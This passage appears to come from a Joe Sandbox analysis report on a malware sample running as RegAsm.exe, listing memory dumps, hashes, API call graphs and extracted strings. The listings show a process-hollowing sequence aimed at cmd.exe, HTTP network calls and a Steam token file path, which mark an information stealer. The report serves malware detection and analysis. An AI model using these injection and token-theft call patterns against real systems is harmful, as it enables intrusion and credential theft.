                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: GetXStateFeaturesMask$InitializeCriticalSectionEx
                                              • API String ID: 0-4196971266
                                              • Opcode ID: 49882a5cbf98c5051f0c2674bbcc89656e20f7c30570e36894156b09c2b19274
                                              • Instruction ID: 941605d4b47d6b9f90401f5a726d5949589a6ce63cb6f0c8c4a5d0d703597f01
                                              • Opcode Fuzzy Hash: 49882a5cbf98c5051f0c2674bbcc89656e20f7c30570e36894156b09c2b19274
                                              • Instruction Fuzzy Hash: A4018F3A584228B7CB112AA5CC45ECE7F26EB54FA2F054012FD196B310EA729872D6E4
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Xinvalid_argumentmemcpystd::_
                                              • String ID: string too long
                                              • API String ID: 1835169507-2556327735
                                              • Opcode ID: 524a70902acbee817e7c2225f571579b0f85964725ce8f35b52a0cc4692501ae
                                              • Instruction ID: 8b9cda667150de8da229166ed374495bd93bd7f8ad643b39e6e75cd412ccdd48
                                              • Opcode Fuzzy Hash: 524a70902acbee817e7c2225f571579b0f85964725ce8f35b52a0cc4692501ae
                                              • Instruction Fuzzy Hash: F011E2313086109BEB349F2F884596AB7A9EF41710B140D3FF446AB3C1CB7AD925879D
                                              APIs
                                              • std::_Xinvalid_argument.LIBCPMT ref: 0040ECE4
                                                • Part of subcall function 0041FAB0: std::exception::exception.LIBCMT ref: 0041FAC5
                                                • Part of subcall function 0041FAB0: __CxxThrowException@8.LIBCMT ref: 0041FADA
                                                • Part of subcall function 0041FAB0: std::exception::exception.LIBCMT ref: 0041FAEB
                                                • Part of subcall function 0040EAD3: std::_Xinvalid_argument.LIBCPMT ref: 0040EAE4
                                              • memcpy.MSVCRT ref: 0040ED3F
                                              Strings
                                              • invalid string position, xrefs: 0040ECDF
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throwmemcpy
                                              • String ID: invalid string position
                                              • API String ID: 214693668-1799206989
                                              • Opcode ID: d7c3ee636dfde35e99b2e48b6ec15f19c159fbeec3d8ddae442131194ee78d4f
                                              • Instruction ID: 38878d5cb8b98c52d85073cf0eec1802e8f1f86065acee281559ebaee1538d13
                                              • Opcode Fuzzy Hash: d7c3ee636dfde35e99b2e48b6ec15f19c159fbeec3d8ddae442131194ee78d4f
                                              • Instruction Fuzzy Hash: B611C432304211DBDB249E1AD881A6AB3A5EF95710B100D3FF917A73C1C7B9DD6187AE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: F
                                              • API String ID: 0-1304234792
                                              • Opcode ID: 228469d85a49c7d64841d7fbe72a9087def0d6a70335d86845393053a3bda1a2
                                              • Instruction ID: ac3cb798463d5853af162ff3041319a937a8e388f38d7b3d2baa16cabb48e7fe
                                              • Opcode Fuzzy Hash: 228469d85a49c7d64841d7fbe72a9087def0d6a70335d86845393053a3bda1a2
                                              • Instruction Fuzzy Hash: 651160B66093408BCB04DF19C85279FB7E4BFE8314F84482EE48A87290E774E508CB97
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 0041596B
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                              • lstrlenA.KERNEL32(00000000,00000000,?,00000000,0042770A), ref: 004159BC
                                                • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                • Part of subcall function 00415865: _EH_prolog.MSVCRT ref: 0041586A
                                                • Part of subcall function 00415865: CreateThread.KERNEL32(00000000,00000000,00414052,?,00000000,00000000), ref: 00415910
                                                • Part of subcall function 00415865: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00415918
                                                • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                              Strings
                                              • Soft\Steam\steam_tokens.txt, xrefs: 004159D4
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog$lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                              • String ID: Soft\Steam\steam_tokens.txt
                                              • API String ID: 40794102-3507145866
                                              • Opcode ID: 6e099bdc78ef3f6b28fd805c007afa12f89ebb41604d3afa3c7efb165c798aa8
                                              • Instruction ID: b262896f77ba43b15df3a5861651c341728552a40ae0278935f2fa84f0773dd9
                                              • Opcode Fuzzy Hash: 6e099bdc78ef3f6b28fd805c007afa12f89ebb41604d3afa3c7efb165c798aa8
                                              • Instruction Fuzzy Hash: 55214D71900148EACB05FBF5C956BDDBB74AF19308F50815EE412721D2EBB827C8CAA6
                                              APIs
                                              • std::_Xinvalid_argument.LIBCPMT ref: 0040E930
                                                • Part of subcall function 0041FAB0: std::exception::exception.LIBCMT ref: 0041FAC5
                                                • Part of subcall function 0041FAB0: __CxxThrowException@8.LIBCMT ref: 0041FADA
                                                • Part of subcall function 0041FAB0: std::exception::exception.LIBCMT ref: 0041FAEB
                                              • memmove.MSVCRT ref: 0040E969
                                              Strings
                                              • invalid string position, xrefs: 0040E92B
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                              • String ID: invalid string position
                                              • API String ID: 1659287814-1799206989
                                              • Opcode ID: f97c601c4e22bc11f73bdc13f7d6f7448820bd60555938bed086b3ec4847633e
                                              • Instruction ID: 9802af65f48c4a0334408e40b234199155afed96a9865595e4f9dfd6fcdb0f46
                                              • Opcode Fuzzy Hash: f97c601c4e22bc11f73bdc13f7d6f7448820bd60555938bed086b3ec4847633e
                                              • Instruction Fuzzy Hash: 6F0128B23003014BD7249E69C99082BB7A6EB817107204D3FD4D59B385DBB9EC5687ED
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 004122DB
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768
                                                • Part of subcall function 004041B2: _EH_prolog.MSVCRT ref: 004041B7
                                                • Part of subcall function 004041B2: GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004041FE
                                                • Part of subcall function 004041B2: RtlAllocateHeap.NTDLL(00000000), ref: 00404205
                                                • Part of subcall function 004041B2: InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404224
                                                • Part of subcall function 004041B2: StrCmpCA.SHLWAPI(?), ref: 00404238
                                                • Part of subcall function 004041B2: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040425C
                                                • Part of subcall function 004041B2: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404292
                                                • Part of subcall function 004041B2: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004042B6
                                                • Part of subcall function 004041B2: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004042C1
                                                • Part of subcall function 0040FE58: memset.MSVCRT ref: 0040FE81
                                                • Part of subcall function 0040FE58: memset.MSVCRT ref: 0040FE8D
                                                • Part of subcall function 0040FE58: CreateProcessA.KERNEL32(?,J#A,00000000,00000000,00000000,08000004,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0040FEAD
                                                • Part of subcall function 0040FE58: VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,?,?,?,00000000,00000000), ref: 0040FEC1
                                                • Part of subcall function 0040FE58: GetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,00000000), ref: 0040FED3
                                                • Part of subcall function 0040FE58: ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,?,?,00000000,00000000), ref: 0040FEF2
                                                • Part of subcall function 0040FE58: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,00000000,00000000), ref: 0040FF08
                                                • Part of subcall function 0040FE58: ResumeThread.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 0040FF18
                                              Strings
                                              • C:\Windows\system32\cmd.exe, xrefs: 00412340
                                              • C:\Windows\system32\cmd.exe, xrefs: 0041232E
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InternetProcess$AllocH_prologHeapHttpOpenRequestThreadVirtuallstrcpymemset$AllocateConnectContextCreateMemoryOptionReadResumeSend
                                              • String ID: C:\Windows\system32\cmd.exe$C:\Windows\system32\cmd.exe
                                              • API String ID: 2744571281-3520584164
                                              • Opcode ID: 48c00dabfe6732b60cffb06e03e7ebd249ffd90821f05cbba0bff7b919695fee
                                              • Instruction ID: 6b8cab2fc6870a534da447030600b668c0e13afa70a54e89719b9d5b2ca8f0bf
                                              • Opcode Fuzzy Hash: 48c00dabfe6732b60cffb06e03e7ebd249ffd90821f05cbba0bff7b919695fee
                                              • Instruction Fuzzy Hash: C901E970E04254ABCB10FBB5D9067EDBB60AB00704F10416BEC15726C2D6B81B8486DA
                                              Strings
                                              • invalid, xrefs: 1B6B721B
                                              • API call with %s database connection pointer, xrefs: 1B6B7220
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: API call with %s database connection pointer$invalid
                                              • API String ID: 0-3574585026
                                              • Opcode ID: 1a3e5842ef4c9bed3f05a1a8a5f411c4a12e263afe4b9de163576746bc825e87
                                              • Instruction ID: ce1cb60d08a7df148c90e2c8fc665d26a584b3ec89e1c2edc27efc0b053bd449
                                              • Opcode Fuzzy Hash: 1a3e5842ef4c9bed3f05a1a8a5f411c4a12e263afe4b9de163576746bc825e87
                                              • Instruction Fuzzy Hash: 4EF0C2F1B056104BCE204B28FD14BF777BA7B60B21F090559F6E696290C238E454C391
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %z%s%z
                                              • API String ID: 0-3434679432
                                              • Opcode ID: 6c7504cf15be94c28fa4abd564b82e2114003592e6f1c06552a58613af74a5a3
                                              • Instruction ID: f2be5920cdd5741c464ce272fb807601579a2ca3e01469da91740f2afd97a3b6
                                              • Opcode Fuzzy Hash: 6c7504cf15be94c28fa4abd564b82e2114003592e6f1c06552a58613af74a5a3
                                              • Instruction Fuzzy Hash: 88F0E2B09007028FEB108B29E8916EB72E9FF88381F41092DFC86C2980F331F844CB51